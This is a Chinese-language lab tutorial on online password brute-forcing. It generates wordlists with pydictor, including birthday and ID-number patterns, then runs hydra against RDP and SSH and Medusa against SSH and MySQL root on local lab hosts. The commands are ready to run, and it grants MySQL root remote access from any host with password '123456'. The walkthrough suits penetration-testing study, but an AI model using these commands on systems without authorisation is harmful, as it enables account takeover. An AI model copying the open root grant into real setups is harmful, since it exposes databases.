使用 pydictor 生成自己的字典工具
pydictor 它可以幫助我們快速的生成普通爆破字典、基于網(wǎng)站內(nèi)容的自定義字典、社會工程學(xué)字典等等一系列高級字典
還可以使用內(nèi)置工具,對字典進(jìn)行安全刪除、合并、去重、合并并去重、高頻詞篩選
生成獨一無二的高度定制、高效率和復(fù)雜字典,生成密碼字典的好壞和你的自定義規(guī)則、能不能熟練使用pydictor有很大關(guān)系
兼容性強python 2.7版本還是python 3.4 以上版本,pydictor都可以在Windows、Linux 或者是Mac上運行
pydictor下載
https://github.com/LandGrey/pydictor/
liunx下載使用
git clone --depth=1 --branch=master https://www.github.com/landgrey/pydictor.git
cd pydictor/
chmod +x pydictor.py
python pydictor.py
常用的參數(shù)說明
-base Type
d digital [0 - 9] # digital [?d?d??tl] 數(shù)字的
L lowercase letters [a - z] # lowercase ['l????ke?s] 小寫字母;letters [?let?z] 信,字母
c capital letters [A - Z] # capital [?k?p?tl] 大寫的
-o 指定字典存儲的位置
--len 長度位數(shù)
-char '@#$%^&*abcdefg12345678' 有特殊字符的自定義字符集字典
--head Pa5sw0rd 生成以 Pa5sw0rd 開頭
插件型字典 (可自己根據(jù) API 文檔開發(fā))
1. 一段時間內(nèi)生日字典
python pydictor.py -plug birthday 19800101 20001231 --len 6 8
2. 身份證后4/6/8位字典
python pydictor.py -plug pid4
python pydictor.py -plug pid6 --encode b64
python pydictor.py -plug pid8 --encode sha1 -o pid8.txt
3. 網(wǎng)頁原始關(guān)鍵詞字典
python pydictor.py -plug scratch 用/funcfg/scratch.sites 文件中的多行 url 作為輸入
python pydictor.py -plug scratch http://www.example.com
內(nèi)置工具(可自己根據(jù)API文檔開發(fā))
1. 字典合并工具
python pydictor.py -tool combiner /my/mess/dir
2. 字典比較工具
python pydictor.py -tool comparer big.txt small.txt
3. 詞頻統(tǒng)計工具
python pydictor.py -tool counter s huge.txt 1000
python pydictor.py -tool counter v /tmp/mess.txt 100
python pydictor.py -tool counter vs huge.txt 100 --encode url -o fre.txt
4. 字典處理工具
python pydictor.py -tool handler raw.txt --tail @awesome.com --encode md5
python pydictor.py -tool handler raw.txt --len 6 16 --occur "" "=6" "<0" --encode b64 -o ok.txt
5. 安全擦除字典工具
python pydictor.py -tool shredder 擦除當(dāng)前輸出目錄下所有字典文件
python pydictor.py -tool shredder base 擦除當(dāng)前輸出目錄下所有以"base"開頭的字典文件
python pydictor.py -tool shredder /data/mess
python pydictor.py -tool shredder D:\mess\1.zip
6. 合并去重工具
python pydictor.py -tool uniqbiner /my/all/dict/
7. 字典去重工具
python pydictor.py -tool uniqifer /tmp/dicts.txt --output /tmp/uniq.txt
8. 多字典文件組合工具
python pydictor.py -tool hybrider heads.txt some_others.txt tails.txt
文檔使用請參照:
https://github.com/LandGrey/pydictor/blob/master/docs/doc/usage.md
使用 hydra 工具在線破解系統(tǒng)用戶密碼
使用 hydra 破解 windows 7 遠(yuǎn)程桌面密碼
Windows 遠(yuǎn)程桌面使用的 rdp 協(xié)議,默認(rèn)端口是 3389,系統(tǒng)中默認(rèn)是沒有開啟遠(yuǎn)程桌面服務(wù)
的,我們需要手動開啟。
1)開始->運行-> 輸入: sysdm.cpl
打開高級系統(tǒng)設(shè)置
2)同樣通過 nmap 掃描 3389 端口確保服務(wù)開啟。
nmap 192.168.1.56 -p 3389
3)暴力破解遠(yuǎn)程桌面密碼
hydra -l administrator -P m.txt rdp://192.168.1.56 -vV
4)通過遠(yuǎn)程桌面進(jìn)行連接
開始運行輸入 mstsc
5)遠(yuǎn)程連接成功。
注:如果目標(biāo)系統(tǒng)用戶正在使用操作系統(tǒng),那么遠(yuǎn)程連接之后目標(biāo)用戶會被鎖定。
使用 hydra 工具破解 ssh 服務(wù) root 用戶密碼
1)首先修改一下 linux 主機的密碼確保我們字典中存在正確的密碼。
[root@xuegod63 ~]# passwd
Changing password for user root.
New password: 123456
BAD PASSWORD: The password is shorter than 8 characters
Retype new password: 123456
passwd: all authentication tokens updated successfully.
2)使用 hydra 工具進(jìn)行破解 root 密碼
hydra -l root -P m.txt -t 4 ssh://192.168.1.63 -e nsr -vV
以上參數(shù)說明:
-t 通過 -t 參數(shù)來指定線程數(shù)默認(rèn)是 16 會造成服務(wù)器拒絕連接。切記不能太快。
-e nsr 參數(shù): 該-e 表示提供了更多測試選項。nsr 后面的字母對應(yīng)更多的測試方式。
n 是嘗試空密碼登錄
s 是將用戶名作為密碼登錄
r 是將用戶名反過來作為密碼登錄。 如:用戶名是 root,那么會使用 toor 嘗試破解。
使用 Medusa 工具在線破解
Medusa 簡介
官方網(wǎng)站:http://foofus.net/goons/jmk/medusa/medusa.html。
軟件下載地址:https://github.com/jmk-foofus/medusa/archive/2.2.tar.gz
medusa參數(shù)說明
medusa 命令選項:常用參數(shù)標(biāo)紅
-h [TEXT] #目標(biāo) IP
-H [FILE] #目標(biāo)主機文件
-u [TEXT] #用戶名
-U [FILE] #用戶名文件
-p [TEXT] #密碼
-P [FILE] #密碼文件
-C [FILE] #組合條目文件
-O [FILE] #文件日志信息
-e [n/s/ns] #n 意為空密碼,s 意為密碼與用戶名相同
-M [TEXT] #模塊執(zhí)行名稱
-m [TEXT] #傳遞參數(shù)到模塊
-d #顯示所有的模塊名稱
-n [NUM] #使用非默認(rèn)端口
-s #啟用 SSL
-r [NUM] #重試間隔時間,默認(rèn)為 3 秒
-t [NUM] #設(shè)定線程數(shù)量
-L #并行化,每個用戶使用一個線程
-f #在任何主機上找到第一個賬號/密碼后,停止破解
-q #顯示模塊的使用信息
-v [NUM] #詳細(xì)級別(0-6)
-w [NUM] #錯誤調(diào)試級別(0-10)
-V #顯示版本
-Z [TEXT] #繼續(xù)掃描上一次
-F #破解到一個正確的密碼即退出
Medusa 工具破解 linux root 用戶登錄密碼
medusa -M ssh -h 192.168.1.63 -e ns -F -u root -P m.txt
實戰(zhàn): host.txt 文件中是目標(biāo)主機名稱或者 IP 地址,user.txt 文件中指定需要暴力破解的用戶
名,字典使用“m.txt”。使用 8000 進(jìn)程,同時暴力破解。
參數(shù):
-t [NUM] 設(shè)定子進(jìn)程數(shù)量
-O ssh.log 可以將成功破解的記錄記錄到文件中
medusa -M ssh -h 192.168.1.63 -u root -P ./m.txt -t 8 -O ./ssh.log
Medusa 破解 Mysql root 用戶登錄密碼
Mysql 授權(quán) root 用戶允許遠(yuǎn)程登錄
mysql -uroot -p123456
MariaDB [(none)]> grant all privileges on *.* to 'root'@'%'identified by '123456' with grant option;
MariaDB [(none)]> exit
進(jìn)行暴力破解文章來源:http://www.zghlxwxcb.cn/news/detail-814278.html
medusa -M mysql -h 192.168.1.63 -e ns -F -u root -P m.txt
驗證遠(yuǎn)程登錄 mysql 數(shù)據(jù)庫文章來源地址http://www.zghlxwxcb.cn/news/detail-814278.html
mysql -uroot -p123456 -h192.168.1.63
MariaDB [(none)]> show databases;
到了這里,關(guān)于暴力破解常見的服務(wù)器的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!